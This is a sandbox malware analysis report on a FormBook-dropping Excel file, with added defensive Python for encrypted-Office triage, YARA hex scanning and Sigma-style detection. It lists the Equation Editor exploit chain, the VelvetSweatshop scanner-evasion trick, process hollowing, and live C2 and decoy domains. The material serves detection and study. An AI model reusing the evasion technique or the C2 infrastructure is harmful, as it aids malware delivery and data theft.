
Analysis Report Bank Details.xlsx

Overview

General Information

Sample Name: Bank Details.xlsx
Analysis ID: 385368
MD5: c8aa551fd4cc3b5d6e87ea3f025fa6f2
SHA1: 3285390c80ccb179471f31cb4552db8802de518c
SHA256: d22df2dfcfccf5964421ffbbceee8193dc4b6cb6663ea2a3c9687ca57d6779a5
Tags: Hostgator, VelvetSweatshop, xlsx
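The VelvetSweatshop tag means the workbook is encrypted with Excel's default password, the one Excel tries silently when it opens an encrypted file, so the document opens without a prompt while static scanners see only ciphertext inside an OLE2 container. The following is an added example, not part of the Joe Sandbox report and not the analysed sample: a stdlib-only triage that tells a plain OOXML zip from an OLE2 container holding an encrypted package by walking the compound-file directory for the EncryptionInfo and EncryptedPackage streams. Both inputs are constructed inside the block (a three-sector CFB with only the directory entries, and a zip with two part names); decryption itself is left to msoffcrypto-tool, which the `next_step` string names as a suggestion rather than something the code performs.

```python
import io
import struct
import zipfile

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ENDOFCHAIN = 0xFFFFFFFE
FATSECT = 0xFFFFFFFD
FREESECT = 0xFFFFFFFF
# Password Excel tries silently when it opens an encrypted workbook; malware authors set it
# so the file stays encrypted at rest (opaque to scanners) but opens without a prompt.
DEFAULT_EXCEL_PASSWORD = "VelvetSweatshop"

def cfb_stream_names(data: bytes) -> list:
    """List directory entry names of a Compound File Binary (OLE2) container.
    Walks regular sectors only, which is all an EncryptionInfo check needs."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not an OLE2 compound file")
    sector_size = 1 << struct.unpack_from("<H", data, 30)[0]
    fat_sector_count = struct.unpack_from("<I", data, 44)[0]
    dir_start = struct.unpack_from("<I", data, 48)[0]
    difat = struct.unpack_from("<109I", data, 76)
    fat = []   # the header DIFAT covers the first 109 FAT sectors, i.e. files up to ~6.8 MB
    for s in difat[:fat_sector_count]:
        fat.extend(struct.unpack_from("<%dI" % (sector_size // 4), data, (s + 1) * sector_size))
    names, sector, seen = [], dir_start, set()
    while sector != ENDOFCHAIN and sector not in seen:   # `seen` guards against a looped chain
        seen.add(sector)
        base = (sector + 1) * sector_size
        for i in range(sector_size // 128):
            entry = data[base + i * 128: base + (i + 1) * 128]
            name_len = struct.unpack_from("<H", entry, 64)[0]   # bytes, including the UTF-16 NUL
            if name_len >= 2:
                names.append(entry[:name_len - 2].decode("utf-16-le"))
        sector = fat[sector]
    return names

def triage_office_file(data: bytes) -> dict:
    """Plain OOXML zip, OLE2 container holding an encrypted OOXML package, or other OLE2."""
    if data[:2] == b"PK":
        return {"container": "ooxml-zip", "encrypted": False,
                "parts": zipfile.ZipFile(io.BytesIO(data)).namelist()}
    names = cfb_stream_names(data)
    encrypted = "EncryptionInfo" in names and "EncryptedPackage" in names
    return {"container": "ole2", "encrypted": encrypted, "streams": names,
            "next_step": ("try msoffcrypto-tool -p %s, then re-run the zip triage" % DEFAULT_EXCEL_PASSWORD)
                         if encrypted else "inspect OLE streams directly"}

def build_sample_encrypted_container() -> bytes:
    """Constructed input, not the analysed sample: a 3-sector CFB (header, FAT, directory)
    carrying only the directory entries an encrypted OOXML has, with no payload data."""
    ss = 512
    header = bytearray(ss)
    header[:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", header, 24, 0x3E, 3, 0xFFFE, 9, 6)   # versions, byte order, shifts
    struct.pack_into("<I", header, 44, 1)                 # one FAT sector
    struct.pack_into("<I", header, 48, 1)                 # directory chain starts at sector 1
    struct.pack_into("<I", header, 56, 0x1000)            # mini-stream cutoff
    struct.pack_into("<II", header, 60, ENDOFCHAIN, 0)    # no mini FAT
    struct.pack_into("<II", header, 68, ENDOFCHAIN, 0)    # no extra DIFAT sectors
    struct.pack_into("<109I", header, 76, 0, *([FREESECT] * 108))   # DIFAT[0]: FAT is sector 0
    fat = bytearray(struct.pack("<I", FREESECT) * (ss // 4))
    struct.pack_into("<II", fat, 0, FATSECT, ENDOFCHAIN)  # sector 0 = FAT, sector 1 = last dir sector
    directory = bytearray(ss)
    for i, name in enumerate(["Root Entry", "EncryptionInfo", "EncryptedPackage"]):
        encoded = name.encode("utf-16-le") + b"\x00\x00"
        directory[i * 128: i * 128 + len(encoded)] = encoded
        struct.pack_into("<H", directory, i * 128 + 64, len(encoded))
    return bytes(header + fat + directory)

def build_sample_plain_xlsx() -> bytes:
    """Constructed input: a zip with the minimum OOXML part names, no real workbook content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_office_file(build_sample_encrypted_container()))
    print(triage_office_file(build_sample_plain_xlsx()))
```

On a real sample the same two checks run over the file bytes; an OLE2 result with both streams present is the cue to decrypt with the default password before any signature or oleObject inspection, since the embedded Equation Editor object is invisible until then.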

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Drops PE files to the user root directory
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2316 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2592 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2968 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2C64897AA30694CC768F5EA375157932)
      • vbc.exe (PID: 2924 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2C64897AA30694CC768F5EA375157932)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • help.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\help.exe MD5: 0F488C73AA50C2FC1361F19E8FC19926)
            • cmd.exe (PID: 1836 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further entries not shown)

      Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.vbc.exe.2e30000.15.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.2e30000.15.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.2e30000.15.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries not shown)
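The strings listed above are YARA hex patterns, and two of them are worth reading as code: `$sequence_0` decodes to `add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax`, the RDTSC timing check the report lists under "Tries to detect virtualization through RDTSC time measurements", and the JPCERT strings are `push imm32` instructions whose immediates the rule authors label as the hashed sqlite3_step/text/blob names. The block below is an added example, not the rules' own code and not YARA: a small scanner that compiles such patterns (with `??` wildcards, which these particular strings do not use) into regular expressions, runs them over a constructed buffer in which the sequences have been planted, and decodes the pushed constants. The report does not reproduce either rule's condition clause, so the "all three sqlite3 pushes" test in `summarize` is my assumption, not JPCERT's.

```python
import re

# Patterns copied from the rule matches listed above; YARA "??" wildcards are accepted too.
PATTERNS = {
    # Formbook_1 (yara-signator): add ecx,eax ; rdtsc ; sub eax,ecx ; mov [ebp-4],eax
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    # Formbook_1: pop ebp ; ret ; lea edx,[eax+0x7c] ; cmp dl,7
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    # Formbook (JPCERT/CC): push imm32 of the hashed SQLite API names
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}

HEX = set("0123456789abcdefABCDEF")

def compile_hex_pattern(pattern: str):
    """Turn a YARA-style hex string into a lookahead regex so overlapping hits are all reported."""
    body = b""
    for tok in pattern.split():
        if tok == "??":
            body += b"."
        elif len(tok) == 2 and set(tok) <= HEX:
            body += re.escape(bytes([int(tok, 16)]))
        else:
            raise ValueError("unsupported token %r" % tok)
    return re.compile(b"(?=" + body + b")", re.DOTALL)

def scan(buffer: bytes, patterns=PATTERNS) -> dict:
    """Return {name: [offsets]} for every pattern that occurs in buffer."""
    hits = {}
    for name, pat in patterns.items():
        offsets = [m.start() for m in compile_hex_pattern(pat).finditer(buffer)]
        if offsets:
            hits[name] = offsets
    return hits

def pushed_constants(buffer: bytes, hits: dict) -> dict:
    """For the push-imm32 strings, decode the little-endian immediate that follows opcode 0x68."""
    out = {}
    for name, offsets in hits.items():
        if name.startswith("$sqlite3"):
            out[name] = [int.from_bytes(buffer[o + 1:o + 5], "little") for o in offsets]
    return out

def summarize(hits: dict) -> dict:
    """Which rule family would plausibly fire. Assumption: the JPCERT rule needs all three
    sqlite3 pushes; the report does not print either rule's real condition clause."""
    return {
        "yara-signator Formbook_1": any(n.startswith("$sequence_") for n in hits),
        "JPCERT Formbook": all(n in hits for n in ("$sqlite3step", "$sqlite3text", "$sqlite3blob")),
    }

def build_sample_dump() -> bytes:
    """Constructed buffer (not a real dump): NOP filler with the sequences planted at fixed offsets."""
    buf = bytearray(b"\x90" * 0x400)
    def put(offset, hexstr):
        raw = bytes.fromhex(hexstr)
        buf[offset:offset + len(raw)] = raw
    put(0x10, PATTERNS["$sequence_0"])
    put(0x80, PATTERNS["$sequence_0"])          # the report shows two hits for this string
    put(0x120, PATTERNS["$sqlite3step"])
    put(0x140, PATTERNS["$sqlite3text"])
    put(0x160, PATTERNS["$sqlite3blob"])
    return bytes(buf)

if __name__ == "__main__":
    dump = build_sample_dump()
    found = scan(dump)
    for name, offs in found.items():
        print(name, [hex(o) for o in offs])
    print(pushed_constants(dump, found))
    print(summarize(found))
```

Run against a real minidump or the `.unpack` files above, the scanner reports the same offsets YARA does for these strings; the point of the lookahead form is that YARA also reports overlapping occurrences, which `re.finditer` on a plain pattern would skip.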

          Sigma Overview

          System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.141.138.117, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2592, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
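Both Sigma hits rest on one fact: the Equation Editor is a viewer that has no business opening sockets or writing executables, so any Sysmon EventID 3 or 11 with EQNEDT32.EXE as the image is suspicious on its own, and the TargetFilename under Content.IE5 (the WinInet cache) shows it downloaded winlog.exe itself rather than handing off to a browser. The block below is an added example, not the Sigma rules' text and not Joe Sandbox code: the two detections above plus the report's "Office equation editor starts processes" signature written as Sigma-style selections, evaluated by a minimal matcher over Sysmon-shaped events constructed from the values the report prints (field names follow Sysmon; the Excel EMF write is included as the event that must not fire).

```python
# Sysmon-shaped events constructed from the values in the Sigma Overview and the process tree
# (EventID 1 = process creation, 3 = network connection, 11 = file create).
EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
TIF = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"

EVENTS = [
    {"EventID": 1, "ProcessId": 2968, "Image": r"C:\Users\Public\vbc.exe", "ParentImage": EQNEDT32},
    {"EventID": 3, "ProcessId": 2592, "Image": EQNEDT32, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.22", "SourcePort": 49170,
     "DestinationIp": "103.141.138.117", "DestinationPort": 80},
    {"EventID": 11, "ProcessId": 2592, "Image": EQNEDT32,
     "TargetFilename": TIF + r"\Content.IE5\ZAE7RW1P\winlog[1].exe"},
    # benign neighbour that must not fire: Excel writing its own render cache
    {"EventID": 11, "ProcessId": 2316, "Image": EXCEL,
     "TargetFilename": TIF + r"\Content.MSO\7C8CCA5F.emf"},
]

# Selections in a Sigma-like shape: every field must match (AND); a list value means any-of.
RULES = {
    "EQNEDT32.EXE connecting to internet": {
        "EventID": 3, "Image|endswith": r"\eqnedt32.exe", "Initiated": True},
    "File Dropped By EQNEDT32EXE": {
        "EventID": 11, "Image|endswith": r"\eqnedt32.exe"},
    "Office equation editor starts processes": {
        "EventID": 1, "ParentImage|endswith": r"\eqnedt32.exe"},
}

def field_matches(event: dict, key: str, expected) -> bool:
    """Sigma-style field test: optional |endswith / |startswith / |contains modifier,
    case-insensitive string comparison, list of expected values means any-of."""
    field, _, modifier = key.partition("|")
    if field not in event:
        return False
    actual = event[field]
    for want in (expected if isinstance(expected, list) else [expected]):
        a, w = str(actual).lower(), str(want).lower()
        if modifier == "" and (actual == want or a == w):
            return True
        if modifier == "endswith" and a.endswith(w):
            return True
        if modifier == "startswith" and a.startswith(w):
            return True
        if modifier == "contains" and w in a:
            return True
    return False

def evaluate(rules: dict, events: list) -> dict:
    """Return {rule title: [matching events]} for every rule whose whole selection matches."""
    hits = {}
    for title, selection in rules.items():
        matched = [e for e in events
                   if all(field_matches(e, k, v) for k, v in selection.items())]
        if matched:
            hits[title] = matched
    return hits

if __name__ == "__main__":
    for title, matched in evaluate(RULES, EVENTS).items():
        print(title)
        for e in matched:
            print("   EventID", e["EventID"], "PID", e["ProcessId"],
                  e.get("TargetFilename") or e.get("DestinationIp") or e["Image"])
```

The third rule is the one that survives a patched Equation Editor: even when the exploit changes, EQNEDT32.EXE spawning anything other than nothing is the durable signal, which is why the process tree above (EQNEDT32.EXE to vbc.exe in C:\Users\Public) is worth its own detection rather than relying on the network or file events alone.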

          Signature Overview


          AV Detection:

Found malware configuration
Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll | Metadefender: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll | ReversingLabs: Detection: 37%
Source: C:\Users\Public\vbc.exe | Metadefender: Detection: 13%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 75%
Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: 5.2.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.help.exe.1027960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.2e30000.15.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.help.exe.44c4c0.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.1.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: Binary string: wntdll.pdb | source: vbc.exe, help.exe
Source: Binary string: help.pdb | source: vbc.exe, 00000005.00000002.2218410009.0000000000579000.00000004.00000020.sdmp
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004026BC FindFirstFileA,
Source: excel.exe | Memory has grown: Private usage: 4MB later: 77MB
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop edi
Source: global traffic | DNS query: name: fqe.short.gy
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 52.59.165.42:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 52.59.165.42:443

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
